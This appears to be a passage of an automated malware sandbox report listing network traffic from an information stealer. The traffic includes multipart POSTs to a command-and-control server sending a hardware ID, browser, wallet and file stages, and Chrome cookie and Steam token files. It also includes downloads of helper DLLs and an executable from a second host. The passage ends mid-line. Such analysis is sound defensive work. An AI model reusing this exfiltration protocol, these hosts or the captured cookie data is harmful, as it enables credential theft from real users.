                            Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDAHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 32 35 66 34 31 61 31 38 34 39 36 32 35 31 63 30 39 63 64 66 61 34 63 64 62 31 61 66 38 66 37 38 31 65 64 30 30 61 30 33 64 66 66 38 64 36 37 61 35 32 34 35 65 39 33 64 33 63 32 65 66 61 64 31 30 31 35 35 62 66 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 2d 2d 0d 0a Data Ascii: ------KFHCAEGCBFHJDGCBFHDAContent-Disposition: form-data; name="token"d625f41a18496251c09cdfa4cdb1af8f781ed00a03dff8d67a5245e93d3c2efad10155bf------KFHCAEGCBFHJDGCBFHDAContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------KFHCAEGCBFHJDGCBFHDAContent-Disposition: form-data; name="file"------KFHCAEGCBFHJDGCBFHDA--
                            Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKFHIEGDHJKECAAKKEBHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 32 35 66 34 31 61 31 38 34 39 36 32 35 31 63 30 39 63 64 66 61 34 63 64 62 31 61 66 38 66 37 38 31 65 64 30 30 61 30 33 64 66 66 38 64 36 37 61 35 32 34 35 65 39 33 64 33 63 32 65 66 61 64 31 30 31 35 35 62 66 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 42 2d 2d 0d 0a Data Ascii: ------BKKFHIEGDHJKECAAKKEBContent-Disposition: form-data; name="token"d625f41a18496251c09cdfa4cdb1af8f781ed00a03dff8d67a5245e93d3c2efad10155bf------BKKFHIEGDHJKECAAKKEBContent-Disposition: form-data; name="message"ybncbhylepme------BKKFHIEGDHJKECAAKKEB--
                            Source: global trafficHTTP traffic detected: GET /ldms/66fbfcc9963ca_ldfsna.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJEGCGDGHDHIDHDGCBHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 49 4a 45 47 43 47 44 47 48 44 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 32 35 66 34 31 61 31 38 34 39 36 32 35 31 63 30 39 63 64 66 61 34 63 64 62 31 61 66 38 66 37 38 31 65 64 30 30 61 30 33 64 66 66 38 64 36 37 61 35 32 34 35 65 39 33 64 33 63 32 65 66 61 64 31 30 31 35 35 62 66 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 45 47 43 47 44 47 48 44 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 45 47 43 47 44 47 48 44 48 49 44 48 44 47 43 42 2d 2d 0d 0a Data Ascii: ------BGIJEGCGDGHDHIDHDGCBContent-Disposition: form-data; name="token"d625f41a18496251c09cdfa4cdb1af8f781ed00a03dff8d67a5245e93d3c2efad10155bf------BGIJEGCGDGHDHIDHDGCBContent-Disposition: form-data; name="message"wkkjqaiaxkhb------BGIJEGCGDGHDHIDHDGCB--
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDHIEBFHCAKEHIDGHCBAHost: 46.8.231.109Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 30 38 43 39 33 43 36 34 34 33 33 34 33 30 33 37 33 35 33 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 2d 2d 0d 0a Data Ascii: ------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="hwid"7C08C93C64433430373531------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="build"default------JDHIEBFHCAKEHIDGHCBA--
                            Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCFHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 34 33 37 38 36 35 65 66 31 39 36 39 61 38 66 39 39 30 64 33 61 31 30 39 61 39 31 66 31 34 37 66 61 64 30 35 32 39 62 32 31 35 64 38 30 31 61 39 66 33 63 33 39 37 61 33 34 61 30 37 66 65 63 61 33 65 34 37 31 35 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 2d 2d 0d 0a Data Ascii: ------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="token"f8437865ef1969a8f990d3a109a91f147fad0529b215d801a9f3c397a34a07feca3e4715------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="message"browsers------CGHCGIIDGDAKFIEBKFCF--
                            Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKECAFBFHJDGDHIEHJDHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 34 33 37 38 36 35 65 66 31 39 36 39 61 38 66 39 39 30 64 33 61 31 30 39 61 39 31 66 31 34 37 66 61 64 30 35 32 39 62 32 31 35 64 38 30 31 61 39 66 33 63 33 39 37 61 33 34 61 30 37 66 65 63 61 33 65 34 37 31 35 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 2d 2d 0d 0a Data Ascii: ------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="token"f8437865ef1969a8f990d3a109a91f147fad0529b215d801a9f3c397a34a07feca3e4715------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="message"plugins------AKKECAFBFHJDGDHIEHJD--
                            Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIIEBAAFBFBAKFIDBAFHHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 49 45 42 41 41 46 42 46 42 41 4b 46 49 44 42 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 34 33 37 38 36 35 65 66 31 39 36 39 61 38 66 39 39 30 64 33 61 31 30 39 61 39 31 66 31 34 37 66 61 64 30 35 32 39 62 32 31 35 64 38 30 31 61 39 66 33 63 33 39 37 61 33 34 61 30 37 66 65 63 61 33 65 34 37 31 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 42 41 41 46 42 46 42 41 4b 46 49 44 42 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 42 41 41 46 42 46 42 41 4b 46 49 44 42 41 46 48 2d 2d 0d 0a Data Ascii: ------IIIEBAAFBFBAKFIDBAFHContent-Disposition: form-data; name="token"f8437865ef1969a8f990d3a109a91f147fad0529b215d801a9f3c397a34a07feca3e4715------IIIEBAAFBFBAKFIDBAFHContent-Disposition: form-data; name="message"fplugins------IIIEBAAFBFBAKFIDBAFH--
                            Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDAFCAFCBKECBGCFIIJHost: 46.8.231.109Content-Length: 7431Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCAAFHIEBKJKEBFIEHDHost: 46.8.231.109Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 34 33 37 38 36 35 65 66 31 39 36 39 61 38 66 39 39 30 64 33 61 31 30 39 61 39 31 66 31 34 37 66 61 64 30 35 32 39 62 32 31 35 64 38 30 31 61 39 66 33 63 33 39 37 61 33 34 61 30 37 66 65 63 61 33 65 34 37 31 35 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 2d 2d 0d 0a Data Ascii: ------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="token"f8437865ef1969a8f990d3a109a91f147fad0529b215d801a9f3c397a34a07feca3e4715------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ
                            Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHCGDAFCFHIDBGDHCFCBHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 34 33 37 38 36 35 65 66 31 39 36 39 61 38 66 39 39 30 64 33 61 31 30 39 61 39 31 66 31 34 37 66 61 64 30 35 32 39 62 32 31 35 64 38 30 31 61 39 66 33 63 33 39 37 61 33 34 61 30 37 66 65 63 61 33 65 34 37 31 35 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 2d 2d 0d 0a Data Ascii: ------GHCGDAFCFHIDBGDHCFCBContent-Disposition: form-data; name="token"f8437865ef1969a8f990d3a109a91f147fad0529b215d801a9f3c397a34a07feca3e4715------GHCGDAFCFHIDBGDHCFCBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GHCGDAFCFHIDBGDHCFCBContent-Disposition: form-data; name="file"------GHCGDAFCFHIDBGDHCFCB--
                            Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCAEGDHJKFHJKFIJKJEHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 34 33 37 38 36 35 65 66 31 39 36 39 61 38 66 39 39 30 64 33 61 31 30 39 61 39 31 66 31 34 37 66 61 64 30 35 32 39 62 32 31 35 64 38 30 31 61 39 66 33 63 33 39 37 61 33 34 61 30 37 66 65 63 61 33 65 34 37 31 35 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 2d 2d 0d 0a Data Ascii: ------EHCAEGDHJKFHJKFIJKJEContent-Disposition: form-data; name="token"f8437865ef1969a8f990d3a109a91f147fad0529b215d801a9f3c397a34a07feca3e4715------EHCAEGDHJKFHJKFIJKJEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EHCAEGDHJKFHJKFIJKJEContent-Disposition: form-data; name="file"------EHCAEGDHJKFHJKFIJKJE--
                            Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHDHost: 46.8.231.109Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBGHDGHCGHCAAKFIIECFHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 34 33 37 38 36 35 65 66 31 39 36 39 61 38 66 39 39 30 64 33 61 31 30 39 61 39 31 66 31 34 37 66 61 64 30 35 32 39 62 32 31 35 64 38 30 31 61 39 66 33 63 33 39 37 61 33 34 61 30 37 66 65 63 61 33 65 34 37 31 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 2d 2d 0d 0a Data Ascii: ------DBGHDGHCGHCAAKFIIECFContent-Disposition: form-data; name="token"f8437865ef1969a8f990d3a109a91f147fad0529b215d801a9f3c397a34a07feca3e4715------DBGHDGHCGHCAAKFIIECFContent-Disposition: form-data; name="message"wallets------DBGHDGHCGHCAAKFIIECF--
                            Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGIEHDBAAFIDGDAAAAHost: 46.8.231.109Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 34 33 37 38 36 35 65 66 31 39 36 39 61 38 66 39 39 30 64 33 61 31 30 39 61 39 31 66 31 34 37 66 61 64 30 35 32 39 62 32 31 35 64 38 30 31 61 39 66 33 63 33 39 37 61 33 34 61 30 37 66 65 63 61 33 65 34 37 31 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 2d 2d 0d 0a Data Ascii: ------ECBGIEHDBAAFIDGDAAAAContent-Disposition: form-data; name="token"f8437865ef1969a8f990d3a109a91f147fad0529b215d801a9f3c397a34a07feca3e4715------ECBGIEHDBAAFIDGDAAAAContent-Disposition: form-data; name="message"files------ECBGIEHDBAAFIDGDAAAA--
                            Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGHIDBKJEGIECBGIEHCHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 34 33 37 38 36 35 65 66 31 39 36 39 61 38 66 39 39 30 64 33 61 31 30 39 61 39 31 66 31 34 37 66 61 64 30 35 32 39 62 32 31 35 64 38 30 31 61 39 66 33 63 33 39 37 61 33 34 61 30 37 66 65 63 61 33 65 34 37 31 35 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 